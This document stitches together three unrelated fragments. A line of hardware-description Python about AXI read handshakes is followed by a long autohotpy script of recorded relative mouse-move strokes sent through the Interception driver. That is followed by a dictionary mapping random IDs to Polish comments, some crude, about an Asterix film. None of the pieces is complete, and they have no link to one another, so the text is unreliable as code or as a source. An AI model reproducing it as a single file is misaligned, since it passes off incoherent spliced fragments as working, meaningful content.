ack = vtypes.Ors(self.raddr.arready, vtypes.Not(self.raddr.arvalid))
if counter is None:
counter = self.m.TmpReg(self.burst_size_width + 1, initval=0)
| |
InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0010008811950683594)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.004022121429443359)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.005870342254638672)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0034017562866210938)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0016562938690185547)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0049991607666015625)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0050084590911865234)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0009641647338867188)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.005999565124511719)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.004018306732177734)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0030040740966796875)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.005737781524658203)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0003876686096191406)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.005014181137084961)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0019986629486083984)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.004001140594482422)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.001992940902709961)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.003000974655151367)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0033020973205566406)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0030715465545654297)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0031833648681640625)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0018248558044433594)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0029997825622558594)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.002016305923461914)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.002988100051879883)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0052280426025390625)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0015339851379394531)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0029036998748779297)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0019998550415039062)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0019943714141845703)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0030050277709960938)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.002000570297241211)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0042307376861572266)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0008392333984375)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.005442142486572266)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0029973983764648438)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0030002593994140625)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0009996891021728516)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.005002021789550781)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0029981136322021484)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.00437474250793457)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.005419015884399414)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.001580953598022461)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.004006385803222656)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0024280548095703125)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0005657672882080078)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0034689903259277344)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0013539791107177734)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0016133785247802734)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0030002593994140625)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0030069351196289062)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 0
stroke.y = -1
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0019915103912353516)
stroke = InterceptionMouseStroke()
stroke.state = InterceptionMouseState.INTERCEPTION_MOUSE_MOVE
stroke.flags = InterceptionMouseFlag.INTERCEPTION_MOUSE_MOVE_RELATIVE
stroke.rolling = 0
stroke.x = 1
stroke.y = 0
stroke.information = 0
autohotpy.sendToDefaultMouse(stroke)
autohotpy.sleep(0.0010001659393310547)
| |
'Możecie odejść',
'GUaohE7xwoZwz2vStmlqvsW1quyPE9Ct': 'Ten z wąsami jest słodki',
'ShLTVqsT6t223wUj801vesxTe4o5TmkZ': 'Ale troche stary',
'b1B53u7uknKUlVxQHpvzotIh6QHBplri': '"troche stary jakby, nie?"',
'Wd1MnI0dhEddVmKD7Pvp2LmnCwh6GN3K': 'Nie ten, tamten',
'LSYpFmp0LSq8GgWwimBJu6HM282Vaxca': 'Dla mnie za gruby (?)',
'Mr2tHnCauZrdIrhMqKjakwwUcR2NGa68': 'Było "nie za gruby?"',
'DJp6dOV9YJPQ2itDNGATz5BwKG9NenM6': 'Ty tak specjalnie, co?',
'eAg0NiCwxlwzPutYQLi8r25EiczAwPjM':
'Charakterek to ona ma paskudny, ale nos piękny',
'87Erjzr056sEzdUdc7yjZtdvBxcKiSJk': 'Rzuci mnie krokodylom',
'fCdlKwlAxhKdXc8QzlwRhxenpRJD8KPe': 'Lekko zadarty',
'knDeiEwUwwaFeFyk6YAIO80R3PpI7BGr': '*nawet bardzo, trochę zadarty',
'c8syRBydEpU5deoBl95K8WW840fOdNYw': 'A jaki miała warkocz, co?',
'jcWp08CJS5VFc4hKXyOQIU1nehyUJ3NJ':
'Rzuci mnie do krokodyli, a on nawija o jej nosie!',
'j62yIfvpUrEOKO7GpPi5vPEjNIwjVkuE': 'Myślisz, że krokodyle są smaczne?',
'do6wtDmOB6JFn3iBo8zLOBkzXPVlH6uF':
'Moze byscie sie chociaż troszeczke przejeli?',
'o2gQ9RPRBDew0b0Hkh0CJVItj4GQlUsr': '*chociaż troszeczkę',
'aeoKkQkFePIqSsoqX1AzYmdpgSX36vUY': 'Oooo. Jaka duża mrówka',
'DoUYLGSeImqFp41cpukAJE6mgKhZKHUv': 'Ichtu!',
'iDCypIkGpuE5EmoIuHs4OzhAdbsPpNnz':
'Oeeauu niezły ruch trochę jak na słowiańskim targu. Słowianie mają takie targi na stadionach. Wszystko tam można znaleźć dosłownie wszystko. Niesamowite. Znajomy był na placówce to opowiadał.',
'qnj6Iyvr3J9zWlm5q8m71z9B3pw2ZEfZ': 'Ja to bym coś chętnie przekąsił.',
'GMFEZYWcGajfY0rwAIjWHQ855D1KJOH0':
'Dowód na to że w wielkiej Lechii już 50 lat pne mieli galerie handlowe',
'17mTTxShpQqQnq0dvm33MMiysOFalMWK':
'Trochę się to kojarzy ze stanem surowym, ale robimy postępy',
'ycblByCrQVWucYbv7YDLlqAJ9DkkNtho':
'Niewątpliwie ale do końca jeszcze daleko',
'xYmw2S9ZJsiU786GuTfuTkxTdgDeD0Ii': 'a czas ucieka',
'5ZDCnI9EV0VlCEHtwoA5doGEDHPwZT8u': 'A ten piasek to skąd?',
'HnjSKSKnjQSd0jj3pg6bHFoISAYdrNJ9': 'To nie teraz usuń komentarz',
'GOCceQ0AfmjwZyjprxqJuhppn2yJxX5o': 'Ten piasek już tu był',
'fqCkWjtBKiZtEr6Aj6H5bsrwNPSOtfur': 'To nie teraz usuń komentarz',
'dhoI6Jjl6a8sjdf8j4s8fJqZSufTbpYo':
'Oo no, no no, bo właśnie apropos terminu, to no, to tak jak byłem tam u was, znaczy się w Gol-, Gal-, Galurii, to mówiłeś tak: "tak tak spoko dam Ci napój magiczny no no, hej proszę',
'5F5DGxWG7YDF8RxZR9PALmpix5qNf0Rn': 'Powiedziałem że niczego nie obiecuję',
'0gl1eqBxGKOEUNISKyc4N39UTOE62Zpq': 'Ale jak to?',
'iqrWd2t7finLP38rLdI7Gxaok2SIE8VY':
'To okropne, że poganiają niewolników razami...',
'w8CxyQ8ASoyYSjAuXIuyswF6IMQV84cn': 'Nie nie to nie są niewolnicy',
'isWDqBuRcmX8C56q80BOwpE1laYnZPJq':
'To wysokiej klasy fachowcy zatrudnieni na umowe o dzielo. I nawer dostaja jeść',
'4xAXaHdiAWvHiXqP6Y8tfqi6ALkN0RLw': 'A te baty to dla ozdoby?',
'SSw6tmTAwragod3qVKkqtpUyNzlo5wrY': 'Nie',
'RmHhcyIOOta6Nc1p9NtlTvYqIx4TPL7p': 'Znaczy tak',
'81FxLCvl42eKkKaMdhWeIdbXrgUNLH89':
'Zresztą nie wiem, nikt się na razie nie skarżył',
'keD1Mq3OhqXVx9rHN71mwko3GCfwg03O': 'Co kraj to obyczaj.',
'lduvQsGffJMqy8aOPaKwkAtR2ppESBkw':
'Ej. No ale to tu nie jest to będzie za chwilę.',
'HGjRI29F5gcYi8mINK8zSr5VcmXcBkGO': 'Nom :/',
'UHUPwIM2TEd40utQY1dJTTw9v21EPFuh': 'Istu!',
'NbYdjAkc5kInklTRA1QM4HyLqsU57R76': 'S<NAME> sam sie istu!',
'E6iLlOw1IOCJV59kv8CdhFuZTFRUODmQ': 'znowu kilka kwestii ominiętych :(',
'mmqFTWPkk0uVuxw2udiMPeiBDhr93Ukc':
'Pamiętasz jak raz wymsknął mi się Melchir na gajusa bonusa ?',
'N2cCAUyo99oPv2NPEArPil0Fr8glYiwt': '*menhir',
'Htf0kvhrAXkWHGpLheEaKQDtnN0mZyk8': 'Menhir*',
'42PbZ2gR9CW1PtyTJKUK0N7uIhP30oxV':
'Ważył chyba tyle co te sanie z kamieniami :o',
'g9P1E0oyqPqPR956CcwH23QgzsAzjosn': 'Trzebaby spytać Gajusa...',
'UNBEpaqDzwHsfbLgfH9F9B1XXLt4vMLd': 'Chociaż teraz ma tyle na głowie...',
'6gDbaqMDzSSajHpoYiFLTINeeX37XaHh': 'HAHAH MA NA GLOWIE , JA NIE MOGE',
'KpDReK6L0tDtHCdRT8HiG7JjkweYK24U': '*ile ma na głowie',
'LZY9vOx2iISmCQEYkG6L8mSD5xJMCs84': 'Co kraj to obyczaj.',
'6EK7WpEAWeUjsZHJZsGUVVgsJiNrqwuA':
'No jasne kolejna faktura, dosyć mam tej papirusowej roboty.',
'uAL4b7fVKIR7x5B5dWkhLsa22NyjvdcD':
'Otis, mój skryba.. czyli yyy facet od skrybania.',
'NuTLS6pOEtan0mDZ8kZuIoCxZNrSDVMp': 'Chwała imhotepowi',
'9mycQn0VntHO2vrW5FlhhcxjAFLMYFwt': 'poprawion i przepraszam',
'LjOovQdyDQdHHtlltYYWWkO3t48g35JP': 'Jak to jest być skrybą, dobrze?',
'ne1mu4vqlmUUTrS3CZFGEkFlHn6ptDVy':
'Moim zdaniem to nie ma tak, że dobrze albo że nie dobrze. Gdybym miał powiedzieć, co cenię w życiu najbardziej, powiedziałbym, że ludzi. Ekhm... Ludzi, którzy podali mi pomocną dłoń, kiedy sobie nie radziłem, kiedy byłem sam. I co ciekawe, to właśnie p…Ver más',
'vPExcx4WDFJTdGsTt1Fvl5wb7fIR22aM': 'Filip Nowak wygryw xD',
'V8LR5lAVDpbnZ3pTVVDplAi4JyXF8hoA': 'Wygrał jebany xD',
'IUK961OHvu8cAdestwd6rNJiQ5scz5Jt': 'Erjebeteteke',
'ouF0RWrFVilHmgWf9LyiIxhKjrx9wXK6': 'Co dzisiaj na obiad?',
'p5Vv5HNsN3styZl9N6O3x6MBmxkb83bj': 'Jak zwykle, soczewica...',
'k2m8xsgaEu39mCjSiBadoCWha67bu39f': 'Zaraz wracam',
'uNrruqLFj92DFf63LWWWpI2vNKgZMVqI':
'Niebawem ma tu stanąć pałac Cezara. Zostało 58 dni.',
'AJx2AAGhQKzKj0hsoEQSH6lGcOvcR85d': '-Czemu Cię wczoraj nie było?',
'2qrIKbiAxhrIjv1ITVCS33DynaRJAP3Z':
'Robotnice i robotnicy! Towarzysze... Co to? Pracujecie jak niewolnicy?! Lżą Was, smagają batogiem, w imię czego? Pychy Cezara?! Nieee, niech sobie stawia pałace ale w Rzymie, nie u Nas! Wy tutaj harujecie, a hipopotamy to kto nakarmi, co?',
'D5PhKyDd3uPzWleqqZnuZUCO6BEF0LyB': 'Dobrze gada!',
'3yN8JyUNOAf1o5OPYxpbAlkROo3SgXJG':
'IHMAKURUKU ERUCZENE JUCZENEMIJ ahteczebe...',
'GxRZK6NK08N03tlPQ4keBuz0aNszFYTs': 'Ula Późniecka Łeeeeeeeee',
'qWW7kwOxCPQ5x7fm61PgHSkW6YYUUgyp':
'Towarzysze, wyzyskują Was! Głusi są na roszczenia! I... Naprawdę... I właśnie.',
'LScR6VipQTGBwVBM6FGDxR3TzE5Ok9n4': 'Ma rację!',
'sOGDTjYedGEX14zQRulho9sfGaIa2rLt':
'A tu o, dwa ogromne posągi Cezara i Kleopatry, ale bez przesadyzmu 15 metrów nie więcej. A tutaj, zaraz za tymi sfinksami duża, otwarta kuchnia.',
's8FjhigYzYcSatNA76U6rMT0l70vL3YW':
'Ale... to tuż koło sypialni... to chyba nie najlepiej..',
'xetvPfbwrjLoCIIeAX5JnSq8kE1IAad1': 'Co, zapachy i hałas?',
'cx7T0D5GU0TeOZ9rBGOJJOcmpbHpNTWX': 'Niektórym to przeszkadza.',
'a21jhVIsWoJwG3J3G14O7aE33AgrGd5k': 'Tego nie przewidziałem',
'4LGk5zQHgt9YQYoQzaildjjenthv5Mkj': 'Co to za rodzynki są?',
'ERncVcS8l8OF3WMmpAvEjuXbLj0qMxBL':
'To daktyle są. Rosną na tamtych drzewach',
'3gE7J8miGW2n26Vw1wR7OdZDuL82Yq2T': 'Chrupie w środku',
'R3xaqjv5ABxvU07xDWNebjOrhydRSKTR': 'To pestki',
'eKSPcvET9TadKJf6O3DwdBZsLNG5bXEe': 'Nawet niezłe',
'iKcD6ULlUG9tYmrtCiK2esjFkq8k3dDI': 'nawet niezłe ;)',
'2zrLFG4xb8vz33jDSduGkD2qKumZrbsJ':
'Hej! koniec tej przerwy, no ruszać się, do roboty !!',
'fVDP7VTBsnGsV4nnjns8awNagVQ7kl3v': 'jeb jeb jeb jeb',
